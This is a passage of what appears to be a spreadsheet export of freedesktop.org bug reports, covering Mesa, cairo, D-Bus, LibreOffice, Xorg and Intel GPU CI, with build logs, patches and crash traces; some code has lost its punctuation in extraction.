    <t>src/egl/main/egldisplay.c: In function '_eglGetNativePlatform':  error: '_EGL_PLATFORM_' undeclared</t>
  </si>
  <si>
    <t>When building with meson this fails:
arm-unknown-linux-gnueabi-gcc -Isrc/egl/src@egl@@EGL@sha -Isrc/egl -I../mesa-19.0.6/src/egl -Iinclude -I../mesa-19.0.6/include -I../mesa-19.0.6/include/drm-uapi -Isrc -I../mesa-19.0.6/src -I../mesa-19.0.6/src/egl/main -Isrc/loader -I../mesa-19.0.6/src/loader -Isrc/gbm -I../mesa-19.0.6/src/gbm -I../mesa-19.0.6/src/gbm/main -I../mesa-19.0.6/src/gbm/backends/dri -I../mesa-19.0.6/src/egl/../gbm/main -I/opt/emlix/test/sysroot/usr/include/libdrm -fdiagnostics-color=always -pipe -D_FILE_OFFSET_BITS=64 -Wall -Winvalid-pch -std=c99 -O2 -g -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS '-DPACKAGE_VERSION=19.0.6' '-DPACKAGE_BUGREPORT=https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa' -DGLX_USE_TLS -DENABLE_ST_OMX_BELLAGIO=0 -DENABLE_ST_OMX_TIZONIA=0 -DHAVE_X11_PLATFORM -DGLX_INDIRECT_RENDERING -DGLX_DIRECT_RENDERING -DGLX_USE_DRM -DHAVE_DRM_PLATFORM -DENABLE_SHADER_CACHE -DHAVE___BUILTIN_BSWAP32 -DHAVE___BUILTIN_BSWAP64 -DHAVE___BUILTIN_CLZ -DHAVE___BUILTIN_CLZLL -DHAVE___BUILTIN_CTZ -DHAVE___BUILTIN_EXPECT -DHAVE___BUILTIN_FFS -DHAVE___BUILTIN_FFSLL -DHAVE___BUILTIN_POPCOUNT -DHAVE___BUILTIN_POPCOUNTLL -DHAVE___BUILTIN_UNREACHABLE -DHAVE_FUNC_ATTRIBUTE_CONST -DHAVE_FUNC_ATTRIBUTE_FLATTEN -DHAVE_FUNC_ATTRIBUTE_MALLOC -DHAVE_FUNC_ATTRIBUTE_PURE -DHAVE_FUNC_ATTRIBUTE_UNUSED -DHAVE_FUNC_ATTRIBUTE_WARN_UNUSED_RESULT -DHAVE_FUNC_ATTRIBUTE_WEAK -DHAVE_FUNC_ATTRIBUTE_FORMAT -DHAVE_FUNC_ATTRIBUTE_PACKED -DHAVE_FUNC_ATTRIBUTE_RETURNS_NONNULL -DHAVE_FUNC_ATTRIBUTE_VISIBILITY -DHAVE_FUNC_ATTRIBUTE_ALIAS -DHAVE_FUNC_ATTRIBUTE_NORETURN -D_GNU_SOURCE -DUSE_GCC_ATOMIC_BUILTINS -DMAJOR_IN_SYSMACROS -DHAVE_SYS_SYSCTL_H -DHAVE_LINUX_FUTEX_H -DHAVE_ENDIAN_H -DHAVE_DLFCN_H -DHAVE_STRTOF -DHAVE_MKOSTEMP -DHAVE_POSIX_MEMALIGN -DHAVE_TIMESPEC_GET -DHAVE_MEMFD_CREATE -DHAVE_STRTOD_L -DHAVE_DLADDR -DHAVE_DL_ITERATE_PHDR -DHAVE_ZLIB -DHAVE_PTHREAD -DHAVE_PTHREAD_SETAFFINITY -DHAVE_LIBDRM -DHAVE_DRI3 -DHAVE_DRI3_MODIFIERS -Werror=implicit-function-declaration -Werror=missing-prototypes -Werror=return-type -fno-math-errno -fno-trapping-math -Wno-missing-field-initializers -Wno-format-truncation -fPIC -pthread -fvisibility=hidden -DHAVE_MINCORE -D_EGL_NATIVE_PLATFORM=_EGL_PLATFORM_  -MD -MQ 'src/egl/src@egl@@EGL@sha/main_egldisplay.c.o' -MF 'src/egl/src@egl@@EGL@sha/main_egldisplay.c.o.d' -o 'src/egl/src@egl@@EGL@sha/main_egldisplay.c.o' -c ../mesa-19.0.6/src/egl/main/egldisplay.c
+../mesa-19.0.6/src/egl/main/egldisplay.c: In function '_eglGetNativePlatform':
+: error: '_EGL_PLATFORM_' undeclared (first use in this function) did you mean '_EGL_PLATFORM_DRM'?
+: note: in definition of macro '_EGL_NATIVE_PLATFORM'
+: note: each undeclared identifier is reported only once for each function it appears in
+: note: in definition of macro '_EGL_NATIVE_PLATFORM'
And indeed the define is different when building with autotools:
libtool: compile:  arm-unknown-linux-gnueabi-gcc -DPACKAGE_NAME=\Mesa\ -DPACKAGE_TARNAME=\mesa\ -DPACKAGE_VERSION=\19.0.6\ -DPACKAGE_STRING=\Mesa 19.0.6\ -DPACKAGE_BUGREPORT=\https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa\ -DPACKAGE_URL=\\ -DPACKAGE=\mesa\ -DVERSION=\19.0.6\ -D_FILE_OFFSET_BITS=64 -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_DLFCN_H=1 -DLT_OBJDIR=\.libs/\ -DHAVE___BUILTIN_BSWAP32=1 -DHAVE___BUILTIN_BSWAP64=1 -DHAVE___BUILTIN_CLZ=1 -DHAVE___BUILTIN_CLZLL=1 -DHAVE___BUILTIN_CTZ=1 -DHAVE___BUILTIN_EXPECT=1 -DHAVE___BUILTIN_FFS=1 -DHAVE___BUILTIN_FFSLL=1 -DHAVE___BUILTIN_POPCOUNT=1 -DHAVE___BUILTIN_POPCOUNTLL=1 -DHAVE___BUILTIN_UNREACHABLE=1 -DHAVE_FUNC_ATTRIBUTE_CONST=1 -DHAVE_FUNC_ATTRIBUTE_FLATTEN=1 -DHAVE_FUNC_ATTRIBUTE_FORMAT=1 -DHAVE_FUNC_ATTRIBUTE_MALLOC=1 -DHAVE_FUNC_ATTRIBUTE_PACKED=1 -DHAVE_FUNC_ATTRIBUTE_PURE=1 -DHAVE_FUNC_ATTRIBUTE_RETURNS_NONNULL=1 -DHAVE_FUNC_ATTRIBUTE_UNUSED=1 -DHAVE_FUNC_ATTRIBUTE_VISIBILITY=1 -DHAVE_FUNC_ATTRIBUTE_WARN_UNUSED_RESULT=1 -DHAVE_FUNC_ATTRIBUTE_WEAK=1 -DHAVE_FUNC_ATTRIBUTE_ALIAS=1 -DHAVE_FUNC_ATTRIBUTE_NORETURN=1 -DMAJOR_IN_SYSMACROS=1 -DHAVE_ENDIAN_H=1 -DHAVE_DLADDR=1 -DHAVE_CLOCK_GETTIME=1 -DHAVE_PTHREAD_PRIO_INHERIT=1 -DHAVE_PTHREAD=1 -DENABLE_ST_OMX_BELLAGIO=0 -DENABLE_ST_OMX_TIZONIA=0 -I. -I../../../xorg.Mesa3D/src/egl -I../../../xorg.Mesa3D/include -I../../../xorg.Mesa3D/include/drm-uapi -I../../../xorg.Mesa3D/src/mapi -I../../../xorg.Mesa3D/src/egl/main -I../../../xorg.Mesa3D/src/gbm/main -I../../../xorg.Mesa3D/src -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -D_GNU_SOURCE -DUSE_GCC_ATOMIC_BUILTINS -DNDEBUG -DUSE_ARM_ASM -DHAVE_SYS_SYSCTL_H -DHAVE_DLFCN_H -DHAVE_STRTOF -DHAVE_MKOSTEMP -DHAVE_TIMESPEC_GET -DHAVE_MEMFD_CREATE -DHAVE_STRTOD_L -DHAVE_DL_ITERATE_PHDR -DHAVE_POSIX_MEMALIGN -DHAVE_ZLIB -DHAVE_PTHREAD_SETAFFINITY -DHAVE_LINUX_FUTEX_H -DHAVE_LIBDRM -DGLX_USE_DRM -DGLX_INDIRECT_RENDERING -DGLX_DIRECT_RENDERING -DGLX_USE_TLS -DHAVE_DRM_PLATFORM -DHAVE_X11_PLATFORM -DHAVE_DRI3 -DHAVE_DRI3_MODIFIERS -DENABLE_SHADER_CACHE -DHAVE_MINCORE -fvisibility=hidden -I/opt/emlix/test/sysroot/usr/include/libdrm -D_EGL_NATIVE_PLATFORM=_EGL_PLATFORM_DRM -I../../../xorg.Mesa3D/src/loader -I../../src/egl/drivers/dri2 -I../../../xorg.Mesa3D/src/egl/drivers/dri2 -I../../../xorg.Mesa3D/src/gbm/backends/dri -I../../src/egl/wayland/wayland-drm -I../../../xorg.Mesa3D/src/egl/wayland/wayland-drm -O2 -g -march=armv7-a -mtune=cortex-a8 -mfpu=neon -mfloat-abi=softfp -pipe -Wl--no-copy-dt-needed-entries--as-needed -Wl--build-id -Wdate-time -std=c99 -MT main/egldisplay.lo -MD -MP -MF main/.deps/egldisplay.Tpo -c ../../../xorg.Mesa3D/src/egl/main/egldisplay.c  -fPIC -DPIC -o main/.libs/egldisplay.o</t>
  </si>
  <si>
    <t>eb</t>
  </si>
  <si>
    <t>MESA-71543</t>
  </si>
  <si>
    <t>[mesa] Source-based games segfault</t>
  </si>
  <si>
    <t>Source games (Garry's Mod Portal) segfault with last good commit being 4e84f39 and last known bad ab2da98 (5442c0e is bad too mesa = libGL* without radeon_dri) I don't have enough time at this week so I can't bisect this now.
Message: [ 1591.415826] gameoverlayui[15840]: segfault at 0 ip 00000000f6ff0fd9 sp 00000000ffbda850 error 4 in gameoverlayui.so[f6e6e000+712000]
01:00.0 VGA compatible controller: Advanced Micro Devices Inc. [AMD/ATI] Madison [Mobility Radeon HD 5650/5750 / 6530M/6550M] (prog-if 00 [VGA controller])</t>
  </si>
  <si>
    <t>nikoamia</t>
  </si>
  <si>
    <t>DBUS-19195</t>
  </si>
  <si>
    <t>need _DBUS_UINT64_FORMAT etc</t>
  </si>
  <si>
    <t>Right now we warn on these constructs:
#ifdef DBUS_HAVE_INT64
              /* I think I probably mean GNU libc printf and not GNUC
               * but we'll wait until someone complains. If you hit this
               * just turn off verbose mode as a workaround.
               */
#if __GNUC__
              _dbus_verbose ( u64: 0x%llx
                             *(dbus_uint64_t*)
llx here is wrong like all the printf formatters it is for a variable size type (long long int which is only defined to be *at least* 64 bits - it could be larger).
What we need are internal macros similar to GLib's G_INT64_FORMAT etc.</t>
  </si>
  <si>
    <t>CAIRO-3926</t>
  </si>
  <si>
    <t>True dynamic linking of AlphaBlend</t>
  </si>
  <si>
    <t>AlphaBlend() is not available with all windows versions and it 
is not available with the SDK from msvc 6.0. Thus it appears 
appropriate to resolve it at runtime. Patch following:
diff --exclude-from=c:\util\tool\diff.ign -u --recursive
from-cvs/cairo/cairo/src/cairo-win32-surface.c
my-gtk/cairo/cairo/src/cairo-win32-surface.c
--- from-cvs/cairo/cairo/src/cairo-win32-surface.c	Thu Jul 28 22:24:57 2005
+++ my-gtk/cairo/cairo/src/cairo-win32-surface.c	Thu Jul 28 22:33:43 2005
@@ -396 +3934 @@
 static const cairo_surface_backend_t cairo_win32_surface_backend
+/*
+ * True dynamic linking of AlphaBlend not only simplifies the build process
+ * cause the SDK version can be lower. It also does allow the rest of cairo
+ * to run successful one a platform not providing msimg32.dll.
+ */
+static int
+_cairo_win32_alpha_blend(HDC dst int xd int yd int wd int hd
+                         HDC src int xs int ys int ws int hs
+                         BLENDFUNCTION bf)
+{
+    typedef BOOL (WINAPI *PFN_AlphaBlend)
(HDCintintintintHDCintintintintBLENDFUNCTION)
+
+    static HINSTANCE msimg32 = NULL 
+    static PFN_AlphaBlend alpha_blend = NULL
+    static int once = 0
+
+    if (!once) {
+        msimg32 = LoadLibrary (msimg32.dll)
+        alpha_blend = (PFN_AlphaBlend)GetProcAddress (msimg32 AlphaBlend)
+        once = TRUE
+    }
+
+    if (alpha_blend)
+        return alpha_blend(dstxdydwdhdsrcxsyswshsbf)
+
+    return FALSE
+}
+
 /**
  * _cairo_win32_print_gdi_error:
  * @context: context string to display along with the error
@@ -5977 +6257 @@
 	blend_function.SourceConstantAlpha = alpha
 	blend_function.AlphaFormat = src-&gt;format == CAIRO_FORMAT_ARGB32 ? AC_SRC_ALPHA
: 0
-	if (!AlphaBlend (dst-&gt;dc
+	if (!_cairo_win32_alpha_blend  (dst-&gt;dc
 			 dst_x dst_y
 			 width height
 			 src-&gt;dc</t>
  </si>
  <si>
    <t>LIBREOFFICE-65090</t>
  </si>
  <si>
    <t>EDITING: Merged cells in calc are not properly pasted (as RTF) into writer</t>
  </si>
  <si>
    <t>When copying merged cells from calc to writer merged cells are not merged any longer. In LO3 it worked properly. The problem is in LO4.
Steps to reproduce:
1) Create new document in calc
2) fill in some cells and merge some of them (I merge three horizontal cells)
3) select cells including these merged and copy CTRL-C
4) Switch to writer and EDIT-&gt;paste SPECIAL.
5) Choose Formatted text [RTF]
6) The cells are pasted but merging is split</t>
  </si>
  <si>
    <t>wilczewski.piotr</t>
  </si>
  <si>
    <t>TELEPATHY-21148</t>
  </si>
  <si>
    <t>ChannelDispatcher and friends: finalize API</t>
  </si>
  <si>
    <t>Metabug.</t>
  </si>
  <si>
    <t>XORG-10645</t>
  </si>
  <si>
    <t>XV plays only on external VGA</t>
  </si>
  <si>
    <t>When playing a movie (either using MPlayer or Totem both through XV) the Intel driver seems to want to output only on one pipe. On my laptop LVDS is attached to pipe B while VGA is attached to pipe A.
When the XV overlay window is on the laptop screen only the overlay color (blue) is shown without output when it is on an attached VGA output XV output is shown there.
Similarly when the display is cloned only the external VGA output shows while the laptop display shows blue.
When there are no external VGA outputs connected (i.e. only the laptop LCD panel) playing movies via XV shows just the overlay color.
See as follows:
- on clone:
 +------------------+  +------------------+
 |                  |  |                  |
 |  external/VGA    |  |   laptop/LVDS    |
 |                  |  |                  |
 +------------------+  +------------------+
   displays here          blue screen here
- on mergefb:
 +------------------+  +------------------+
 |                  |  |                  |
 |  external/VGA    |  |   laptop/LVDS    |
 |                  |  |                  |
 +------------------+  +------------------+
 overlay window here
 displays here
 +------------------+  +------------------+
 |                  |  |                  |
 |  external/VGA    |  |   laptop/LVDS    |
 |                  |  |                  |
 +------------------+  +------------------+
                       overlay window here
                       blue screen</t>
  </si>
  <si>
    <t>MESA-27256</t>
  </si>
  <si>
    <t>[swrast] piglit depth-level-clamp fails</t>
  </si>
  <si>
    <t>Created attachment 34348
depth-level-clamp.png
mesa: 7a0bcba9f9d7a4dcba11d06f207a5d494a330d5f (master)
Run piglit depth-level-clamp test.
$ ./bin/depth-level-clamp
Probe at (37106)
  Expected: 0.833333 0.833333 0.833333
  Observed: 1.000000 1.000000 1.000000
Probe at (37175)
  Expected: 0.666667 0.666667 0.666667
  Observed: 1.000000 1.000000 1.000000
Probe at (37244)
  Expected: 0.500000 0.500000 0.500000
  Observed: 1.000000 1.000000 1.000000
Probe at (37313)
  Expected: 0.333333 0.333333 0.333333
  Observed: 1.000000 1.000000 1.000000
Probe at (37382)
  Expected: 0.166667 0.166667 0.166667
  Observed: 1.000000 1.000000 1.000000
The test passes on softpipe.</t>
  </si>
  <si>
    <t>DRI-102065</t>
  </si>
  <si>
    <t>[BAT][PNV] igt@gem_exec_suspend@basic-s4-devices timeouts</t>
  </si>
  <si>
    <t>On CI_DRM_2922 the machine fi-pnv-d510 timeouted when running igt@gem_exec_suspend@basic-s4-devices.
Nothing suspicious in the commit log nor in the kernel logs. This may however be related to this issue (bug is being filed right now): https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_2922/fi-bwr-2160/igt@gvt_basic@invalid-placeholder-test.html
Full logs: https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_2922/fi-pnv-d510/igt@gem_exec_suspend@basic-s4-devices.html</t>
  </si>
  <si>
    <t>MESA-90876</t>
  </si>
  <si>
    <t>[965GM] OpenGL software crash on start</t>
  </si>
  <si>
    <t>Created attachment 116325
dmesg output
965GM 
system: Debian 3.2.46-1 x86_64 
libdrm: 2.4.60
kernel: 3.2.0-4-amd64
Reproduce steps:
1. Start X server
2. Run glxgears (or any 3D/OpenGL software)
&gt;&gt; intel_do_flush_locked failed: Input/output error
Workaround with LIBGL_ALWAYS_SOFTWARE=1 works.
 sh -c LIBGL_DEBUG=verbose glxgears
libGL: OpenDriver: trying /usr/lib/x86_64-linux-gnu/dri/tls/i965_dri.so
libGL: OpenDriver: trying /usr/lib/x86_64-linux-gnu/dri/i965_dri.so
Running synchronized to the vertical refresh.  The framerate should be
approximately the same as the monitor refresh rate.
intel_do_flush_locked failed: Input/output error</t>
  </si>
  <si>
    <t>srg.koshelev</t>
  </si>
  <si>
    <t>MESA-65085</t>
  </si>
  <si>
    <t>[radeonsi LLVM] Segfault during OpenCL kernel compilation</t>
  </si>
  <si>
    <t>Created attachment 79901
Kernel that causes the segfault
I get a segmentation fault in LLVM with Tom Stellard's recent radeonsi compute patches (http://lists.cs.uiuc.edu/pipermail/llvm-commits/Week-of-Mon-20130520/175743.html) with the attached kernel.
I can work around the issue when executing the if-block in the kernel unconditionally or with the attached patch to LLVM.
Desc.OpInfo[0].RegClass equals -1 when the segmentation fault occurs.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-71091</t>
  </si>
  <si>
    <t>New account for Stephan Sundermann for GStreamer</t>
  </si>
  <si>
    <t>I was working on new gstreamer-1.0 bindings for mono under this year's gsoc. Currently gstreamer-sharp is located at https://github.com/mono-soc-2013/gstreamer-sharp and should be moved to the gstreamer repository to have everything in one place.
Public key:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZgng2uwuh631gbZj9ssJYoc2+5c16r8PDceJE7B8D9OZjRYcHKgb5bVsW5apZCVI1vjuqhPgCJS2HmSad2UfGQZx5/vJh8lzniroeaYRbhK6x+mECBr5CTBoBJmJzLXbxeDnxQaPxTblMZgJPM49I2DMLEyTVNQW27tP0vT4APHY0IL1BODdzEND5hqhIkh1XksZgC0JoI7ObhTRbyKxM2DZm56IM4PXKjotit3/C1NvYM4DsTF9MAJSdYmJFrLJI15QYZ5MnIdBaKGxgU67wlrEjKk9u2jQSOqUQ95aPap4ipgdgMbHABSOsMqKs3E8e7XIQgoeemkFt2IbGidDL ssundermann@gnome.org</t>
  </si>
  <si>
    <t>ssundermann</t>
  </si>
  <si>
    <t>DBUS-88087</t>
  </si>
  <si>
    <t>Missing varargs cleanup</t>
  </si>
  <si>
    <t>Hi
In two places there is a missing va_end.
/dbus/dbus-string.c:
1087    return FALSE
and
/bus/selinux.c:
160      return
Thanks</t>
  </si>
  <si>
    <t>honey</t>
  </si>
  <si>
    <t>CAIRO-4602</t>
  </si>
  <si>
    <t>cairo use of 0x0 images causes backend failure</t>
  </si>
  <si>
    <t>Cairo occasionally tries to create 0x0 images which causes
_create_dc_and_bitmap to fail and cairo to stop rendering.</t>
  </si>
  <si>
    <t>MESA-32566</t>
  </si>
  <si>
    <t>[GM45] Visual artifacts playing WoW</t>
  </si>
  <si>
    <t>Created attachment 41357
Bug details glxinfo Xorg.0.log
see attachment</t>
  </si>
  <si>
    <t>roblinux</t>
  </si>
  <si>
    <t>MESA-79035</t>
  </si>
  <si>
    <t>radeonsi: Unigine Sanctuary shadows</t>
  </si>
  <si>
    <t>Debian Sid current 32 &amp; 64 i have both separete can compile everything compare with fglrx etc... but can't fix this bug myself :). Hardware is Radeon 8400 aka  R3 that is on Athlon 5350 APU.
 So all in all shadows are broken in Unigine Sanctuary demo. 
 Fglrx and swrast behave fine.
 Some other user at phoronix compared 7790 Bonaire (which also show a bug) with Intel HD 2500 and i can say intel works fine so intel does not show this bug. He also made video of this demo which showing an issue: http://www.phoronix.com/forums/showthread.php?100327-Catalyst-14-4-Has-Advantages-Over-Linux-3-15-Mesa-10-3-Git&amp;p=418131#post418131</t>
  </si>
  <si>
    <t>XORG-12481</t>
  </si>
  <si>
    <t>Xvideo not working</t>
  </si>
  <si>
    <t>to get xorg-server-1.3.99.0-269-g547ad21 starting up without segfaulting
I had to do
index 0b402fa..f15f233 100644
--- a/mi/misprite.c
+++ b/mi/misprite.c
@@ -1817 +1817 @@ miSpriteInitialize (pScreen cursorFuncs screenFuncs)
        return FALSE
     }
     for (pVisual = pScreen-&gt;visuals
-        pVisual-&gt;vid != pScreen-&gt;rootVisual
+        pVisual 
         pVisual++)
     pScreenPriv-&gt;pVisual = pVisual
but I hope this does not make xvideo break.
what the hell is that supposed to do anyways?  is visuals terminated
by any NULL ptr or 0 in vid?
when I start some app which uses xvideo like mplayer
instead of the movie or whatever I get some other junk
like graphics from firefox where I am typing bug reports for Xorg! 8-)
xf86-video-intel-2.1.0-88-gbda3c69
X-Video Extension version 2.2
screen #0
  Adaptor #0: Intel(R) Textured Video
    number of ports: 16
    port base: 73
    operations supported: PutImage 
    supported visuals:
      depth 24 visualID 0x23
      depth 24 visualID 0x24
      depth 24 visualID 0x25
      depth 24 visualID 0x26
      depth 24 visualID 0x27
      depth 24 visualID 0x28
      depth 24 visualID 0x29
      depth 24 visualID 0x2a
    number of attributes: 2
      XV_BRIGHTNESS (range -128 to 127)
              client settable attribute
              client gettable attribute (current value is 0)
      XV_CONTRAST (range 0 to 255)
              client settable attribute
              client gettable attribute (current value is 0)
    maximum XvImage size: 1920 x 1088
    Number of image formats: 4
      id: 0x32595559 (YUY2)
        guid: 59555932-0000-0010-8000-00aa00389b71
        bits per pixel: 16
        number of planes: 1
        type: YUV (packed)
      id: 0x32315659 (YV12)
        guid: 59563132-0000-0010-8000-00aa00389b71
        bits per pixel: 12
        number of planes: 3
        type: YUV (planar)
      id: 0x30323449 (I420)
        guid: 49343230-0000-0010-8000-00aa00389b71
        bits per pixel: 12
        number of planes: 3
        type: YUV (planar)
      id: 0x59565955 (UYVY)
        guid: 55595659-0000-0010-8000-00aa00389b71
        bits per pixel: 16
        number of planes: 1
        type: YUV (packed)
Also even with
Option          CacheLines 2048
and when using XAA I get
X11 error: BadAlloc (insufficient resources for operation)
when I try to view 1920x816 movie.
I play with LinearAlloc later..</t>
  </si>
  <si>
    <t>safari-ml-freedesktop-bugzilla-kv7oy2vp4mc4jvudr6vccb7oetrzzqe7fwnhahno</t>
  </si>
  <si>
    <t>LIBREOFFICE-82035</t>
  </si>
  <si>
    <t>librevenge-based import filters do not work on OS X</t>
  </si>
  <si>
    <t>Using the 64-bit version of LibreOffice 4.3 (release) on OS X 10.9.4 results in broken importing for files tested such as WordPerfect .wpd and Microsoft Publisher .pub. Garbage characters are displayed instead of interpreting and rendering them properly. Highly likely to affect other import filters and other files so not attaching files due to copyright issues with their sources. Problem also seemed to exist on RC2 and RC3 as well.
Using the 64-bit version of LibreOffice 4.2.5 (release) on same setup and files works fine with files being imported and rendered properly.</t>
  </si>
  <si>
    <t>pinertech</t>
  </si>
  <si>
    <t>LIBREOFFICE-74731</t>
  </si>
  <si>
    <t>Help font on OSX very large</t>
  </si>
  <si>
    <t>Created attachment 93687
Large help content font
It seems there is a new font used in displaying online help which is ok. But the font size on OS X seems too large. See attached screenshot.</t>
  </si>
  <si>
    <t>LIBREOFFICE-48081</t>
  </si>
  <si>
    <t>Impress UI: impossible to select animated picture using left mouse click</t>
  </si>
  <si>
    <t>Created attachment 59262
presentation with picture in middle
Linux specific problem.
Steps to reproduce:
0. Open attached document
1. Try select rotating square in middle using left mouse click
Expected: this picture will be selected
Actually: not selected
reproduced in 3.5.1 on Fedora 64 bit but not reproduced in 3.3.4 therefore regression after 3.3.4
PS: not forget to verify how it looks after press F5 after version 3.5.3</t>
  </si>
  <si>
    <t>MESA-88809</t>
  </si>
  <si>
    <t>[gen4] GPU hang on render of specific pages in Chrome</t>
  </si>
  <si>
    <t>Created attachment 112841
syslog dump of time of crash
When rendering certain pages like youtube.com in Chrome a GPU hang occurs making the system unusable. The hang will occur every time such a particular page is loaded but not with most pages and not in FireFox. SysLog details are attached.</t>
  </si>
  <si>
    <t>cybermerchantlucky7</t>
  </si>
  <si>
    <t>MESA-5365</t>
  </si>
  <si>
    <t>ut2k4 locks if future_hw_tcl_on=hw_tcl_on=1</t>
  </si>
  <si>
    <t>Dates back to when t_vp_build.c was made depend on fragment programs.
I have tracked this down and it seems that the lock is caused by having tmu
enabled but frag prog not reading inputs to it.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-12719</t>
  </si>
  <si>
    <t>Dell M65 model lost its vendor</t>
  </si>
  <si>
    <t>I noticed that my carefully drawn geometry went missing in 1.1 :-)
A little investigation revealed that there are a few entries in base.xml which are missing a  element.</t>
  </si>
  <si>
    <t>MESA-60518</t>
  </si>
  <si>
    <t>glDrawElements segfault when compiled into display list</t>
  </si>
  <si>
    <t>VDrift git on a Fedora 18 box (Linux 3.7.6-201.fc18.x86_64 2.1 Mesa 9.0.1) will segfault in the GL2/1 fallback path:
Program received signal SIGSEGV Segmentation fault.
0x00007fffed92461b in _save_VertexAttrib4fvARB (index= v=0x0) at ../../../src/mesa/vbo/vbo_attrib_tmp.h:547
547	      ATTR4FV(VBO_ATTRIB_GENERIC0 + index v)
(gdb) bt
#0  0x00007fffed92461b in _save_VertexAttrib4fvARB (index= v=0x0)
    at ../../../src/mesa/vbo/vbo_attrib_tmp.h:547
#1  0x00007fffed828a1a in _ae_ArrayElement (elt=0) at ../../../src/mesa/main/api_arrayelt.c:1670
#2  0x00007fffed9197bd in _save_OBE_DrawElements (mode=4 count= type= 
    indices=) at ../../../src/mesa/vbo/vbo_save_api.c:1252
#3  0x000000000058bfb9 in MODEL::GenerateListID (this=0x9e7080 error_output=...) at src/graphics/model.cpp:185
#4  0x000000000058b8b3 in MODEL::Load (this=0x9e7080 varray=... error_output=... genlist=true)
    at src/graphics/model.cpp:85
The code looks like this (with vertex texcoord normal pointers set):
glNewList(listid GL_COMPILE)
glDrawElements(GL_TRIANGLES facecount GL_UNSIGNED_INT faces)
glEndList()
Apitrace attached.</t>
  </si>
  <si>
    <t>core13</t>
  </si>
  <si>
    <t>LIBREOFFICE-59273</t>
  </si>
  <si>
    <t>FILEOPEN: Writer doesn't display all table cells in DOCX file</t>
  </si>
  <si>
    <t>Created attachment 72895
source file
Hey
There are steps to reproduce:
1. Choose right border of Data wystawienia row (right upper corner of table)
2. Grab it and drag on the left. 
3. There will appear new row ZaksiÄ™gowaÄ‡ pod datÄ…
This picture show how it should looks. 
https://bugs.freedesktop.org/attachment.cgi?id=70160</t>
  </si>
  <si>
    <t>XORG-13166</t>
  </si>
  <si>
    <t>X does not start when having Xvfb running</t>
  </si>
  <si>
    <t>I have configuration that worked in Fedora 7 but does not work in Fedora 8.
I need to start Proxomitron as a service. It is a Windows based proxy server. I am  running it with Wine. Since it creates a small icon in the tray I need an X screen to connect in order to start it. So as part of the startup scripts I start Xvfb instance on screen 2 and then run Proxomitron with wine and connect to screen 2.
This always worked in Fedora 7. With Fedora 8 I get an error and X refuses to start. I looked at the /tmp/.X11-unix directory - it is there it is owned by root and it has X2 already in it. When I do not start the service from the rc5.d scripts X starts normally I can start the service after that and everything works. A workaround to schedule the service to start in a minute (effectively after X has opportunity to start) works.
All similar message I was able to find on the web are related to the directory being owned by root. In my case there it is something else.</t>
  </si>
  <si>
    <t>dobromirg</t>
  </si>
  <si>
    <t>DRI-108789</t>
  </si>
  <si>
    <t>[CI][BAT] igt@i915_selftest@live_sanitycheck - incomplete - general protection fault: 0000 [#1] PREEMPT SMP PTI</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_4720/fi-gdg-551/igt@i915_selftest@live_sanitycheck.html
 [491.786829] general protection fault: 0000 [#1] PREEMPT SMP PTI
 [491.786852] CPU: 0 PID: 6114 Comm: systemd-udevd Tainted: G     U            4.20.0-rc3-CI-CI_DRM_5159+ #1
 [491.786873] Hardware name: Dell Inc.                 OptiPlex GX280               /0G8310 BIOS A04 02/09/2005
 [491.786900] RIP: 0010:kernfs_find_ns+0x51/0x100
 [491.786913] Code: 20 41 0f 95 c7 85 c0 75 6d 4d 85 e4 0f 95 c0 44 38 f8 0f 85 88 00 00 00 4c 89 e6 4c 89 f7 e8 a6 f9 ff ff 89 c5 48 85 db 74 39  6b 20 72 41 77 29 4c 3b 63 18 72 39 77 21 48 8b 73 f8 4c 89 f7
 [491.786948] RSP: 0018:ffffc900001a3b90 EFLAGS: 00010202
 [491.786962] RAX: 000000004684866e RBX: 0701200107012001 RCX: ffff888039f26ebe
 [491.786978] RDX: 0000000000000720 RSI: 000000004684866e RDI: 0000000000000006
 [491.786993] RBP: 000000004684866e R08: 0000000082c49ee6 R09: 0000000000000001
 [491.787009] R10: ffffc900001a3bc8 R11: ffffffff8226cde0 R12: 0000000000000000
 [491.787024] R13: ffff88803ca949b8 R14: ffff888039f26eb8 R15: 0000000000000000
 [491.787040] FS:  00007f6384e29680(0000) GS:ffff88803e000000(0000) knlGS:0000000000000000
 [491.787058] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [491.787071] CR2: 000055e0ef98a130 CR3: 000000002f97c000 CR4: 00000000000006f0
 [491.787087] Call Trace:
 [491.787100]  kernfs_iop_lookup+0x46/0xa0
 [491.787115]  __lookup_slow+0xfc/0x1d0
 [491.787135]  lookup_slow+0x30/0x50
 [491.787148]  walk_component+0x1ba/0x2d0
 [491.787161]  ? path_init+0x3db/0x510
 [491.787173]  ? getname_flags+0x2d/0x180
 [491.787185]  ? set_track+0x90/0x140
 [491.787199]  path_lookupat+0x69/0x200
 [491.787212]  ? ___slab_alloc.constprop.34+0x21c/0x380
 [491.787227]  ? ___slab_alloc.constprop.34+0x21c/0x380
 [491.787243]  filename_lookup+0xb1/0x140
 [491.787259]  ? getname_flags+0x2d/0x180
 [491.787274]  ? rcu_read_lock_sched_held+0x6f/0x80
 [491.787287]  ? kmem_cache_alloc+0x24d/0x280
 [491.787304]  ? do_readlinkat+0x58/0x110
 [491.787316]  do_readlinkat+0x58/0x110
 [491.787331]  __x64_sys_readlinkat+0x15/0x20
 [491.787344]  do_syscall_64+0x55/0x190
 [491.787359]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
 [491.787373] RIP: 0033:0x7f638493fd1a
